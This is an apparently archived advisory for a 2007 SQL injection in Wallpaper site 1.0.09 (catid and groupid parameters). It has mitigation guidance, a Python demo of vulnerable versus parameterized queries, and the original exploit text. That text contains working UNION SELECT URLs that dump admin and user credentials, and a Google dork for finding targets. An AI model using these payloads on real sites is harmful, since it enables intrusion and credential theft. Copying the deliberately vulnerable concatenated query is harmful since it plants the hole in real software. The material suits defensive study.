Vendor: Wallpaper site
By: Koller
CVSS: N/A
Vulnerability type: SQL Injection
Product Name: Wallpaper site
Affected Version From: 1.0.09
Affected Version To: 1.0.09
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
Published: 2007

Wallpaper site 1.0.09

Wallpaper site 1.0.09 (EasySiteNetwork) builds SQL queries from the catid parameter of category.php and the groupid parameter of siteadmin/editadgroup.php without validating the values or binding them as parameters. Both are numeric ids, so an attacker can append a UNION SELECT and read rows from any table the database user can see. The published payload for category.php selects four columns to match the original query (the 111, 222 and 444 literals are placeholders; the concat_ws(char(58), login, password) expression goes in the third position, presumably the column echoed on the page) and pulls login and password values from the admin_login table, and login, password and email from the users table. The trailing /* comments out whatever the original query appends after the injected value, and the concat_ws/char() syntax shows the backend is MySQL. Recovered administrator credentials can be used at the admin panel, siteadmin/index.php. category.php is part of the public site; editadgroup.php sits under siteadmin/, and its groupid parameter is injectable in the same way.

Mitigation:

No vendor patch is listed, so the fix has to be made in the application code. Both injectable parameters are integer ids: cast or validate catid and groupid as integers before use, and pass them to the database through prepared statements or parameterized queries rather than string concatenation. Escaping or blacklisting keywords such as UNION is not a substitute for parameter binding. Until the code is fixed, restrict access to the siteadmin/ directory and review the database account's privileges so that a successful injection cannot read tables the site does not need.
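The query shape and the published payload, as an added example that is not code from Wallpaper site or from the advisory: a Python/SQLite model of the category.php lookup with the raw catid spliced into the query string, the same lookup with integer validation and parameter binding, and the advisory's UNION payload run against both. Assumptions are labelled in the code: the table layout (only the admin_login table and its login and password columns come from the payload), SQLite standing in for MySQL, and SQLite's || operator in place of MySQL's concat_ws(char(58), ...). The groupid injection in editadgroup.php follows the same pattern and needs no separate example.

```python
import sqlite3

# Constructed schema: an assumption, since the real table layout of Wallpaper
# site is not on the page. Only the admin_login table name and its login /
# password columns come from the published payload; the four-column category
# row is inferred from the 111,222,...,444 placeholders in that payload.
SCHEMA = """
CREATE TABLE categories (
    catid INTEGER, name TEXT, description TEXT, sort_order INTEGER, active INTEGER
);
CREATE TABLE admin_login (id INTEGER, login TEXT, password TEXT);
INSERT INTO categories VALUES (1, 'Nature', 'Landscapes and wildlife', 10, 1);
INSERT INTO categories VALUES (2, 'Cars', 'Sports cars', 20, 0);
INSERT INTO admin_login VALUES (1, 'admin', 's3cret');
"""


def make_db():
    """In-memory SQLite database standing in for the site's MySQL backend."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def category_vulnerable(conn, catid):
    """The flawed pattern: the raw request parameter is spliced into the query
    string, so whatever SQL it contains is executed by the database."""
    sql = ("SELECT catid, name, description, sort_order FROM categories "
           "WHERE catid=" + catid + " AND active=1")
    return conn.execute(sql).fetchall()


def category_fixed(conn, catid):
    """Hardened version: catid is an integer id, so reject anything that is not
    one, then bind the value as a query parameter instead of concatenating."""
    if not catid.isdigit():
        raise ValueError("catid must be a non-negative integer")
    sql = ("SELECT catid, name, description, sort_order FROM categories "
           "WHERE catid=? AND active=1")
    return conn.execute(sql, (int(catid),)).fetchall()


# The published catid payload, URL-decoded ('+' -> space). MySQL's
# concat_ws(char(58), login, password) is rewritten with SQLite's || operator
# (assumption for portability); the trailing /* comments out the rest of the
# original query, which here is the " AND active=1" clause.
PAYLOAD = "1 union select 111,222,login || ':' || password,444 from admin_login/*"


def leaked_credentials(rows):
    """Rows contributed by the injected SELECT carry the 111/444 marker values;
    their third column is the login:password pair the attacker reads off the page."""
    return [row[2] for row in rows if row[0] == 111 and row[3] == 444]


if __name__ == "__main__":
    db = make_db()
    print(category_vulnerable(db, "1"))                            # normal request
    print(leaked_credentials(category_vulnerable(db, PAYLOAD)))    # ['admin:s3cret']
    print(category_fixed(db, "1"))                                 # same normal result
    try:
        category_fixed(db, PAYLOAD)
    except ValueError as exc:
        print("rejected:", exc)
```

The fixed version does two independent things, and both matter: the integer check stops the payload before it reaches the database, and parameter binding guarantees that even a value which slips past validation is treated as data, never as SQL. Keeping the marker literals (111, 444) in the payload is what lets an attacker tell the injected row apart from the site's own rows in the rendered page.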

Exploit-DB raw data:

#    .__                                          __.   
#    NN)    NNNN   JNNN` NNNN.   NNN NNNNNNNNNNN  NN)   
#    NN)    `NNN).NNNF  .NNNNN  (NN) """4NNN"""`  NN)   
#    NN)     (NNNNNN`   (NNNNN) NNN     (NNN      NN)   
#    NN)      4NNNN`    NNN(NNN.NNF     NNN)      NN)   
#    NN)     JNNNNL    (NN) NNNNNN)    (NNN       NN)   
#    NN)    JNNNNNN)   JNN` `NNNNN     JNNF       NN)   
#    NN)  .NNNF (NNN.  NNN   4NNN)     NNN)       NN)   
#    NN) JNNN`   NNNN (NN)    NNN`    (NNN        NN)   
#    NN)                                          NN)  
#    .__           http://xaker.name              __.
#
#
# script name      : Wallpaper site 1.0.09
# Google Dork      : Powered by EasySiteNetwork 
# Of. site         : http://www.easysitenetwork.com/
# The price        : ?
# Risk             : Average
# Found By         : Koller
# Thanks           : all members of xaker.name & grabberz.com
# Vulnerable files : category.php, editadgroup.php

# Vuln : www.victim.com/category.php?catid=1+union+select+111,222,concat_ws(char(58),login,password),444+from+admin_login/*
#        www.victim.com/category.php?catid=1+union+select+111,222,concat_ws(char(58),login,password,email),444+from+users/*
#
# Admin panel: www.victim.com/siteadmin/index.php
#
# Addon :) - sql-injection in editadgroup.php - www.victim.com/siteadmin/editadgroup.php?groupid=2 union select 111,222/*

# P.s. Happy New Year 8)
#
# Contact: K0ller (at) hotmail (dot) CoM

# milw0rm.com [2007-12-22]